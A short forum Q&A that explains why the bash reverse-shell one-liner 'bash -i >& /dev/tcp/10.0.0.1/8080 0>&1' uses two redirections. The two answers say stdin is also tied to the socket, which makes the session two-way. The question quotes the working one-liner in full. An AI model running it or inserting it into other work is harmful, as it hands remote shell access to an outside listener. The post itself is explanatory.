Why are there two file redirections in the bash reverse shell?

Question

443 views Asked by MrRed At 24 November 2024 at 05:57

I've been trying to gain a greater understanding of how reverse shells work and I've been deciphering the bash one:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

I understand that the first redirection (>&) redirects stdout and stderr, but why is there a need for the second one?

There are 2 answers

**CY-OD** · Answer 1 · 2022-03-07 16:24:49

CY-OD On 07 March 2022 at 16:24

This redirects stdin (FD: 0) to come from the socket as well currently on stdout (FD: 1)

**l0b0** · Answer 2 · 2022-03-08 01:43:51

l0b0 On 08 March 2022 at 01:43

It connects standard input and standard output to the same device. This allows two-way communication to the host where the shell is running.

See this article for details.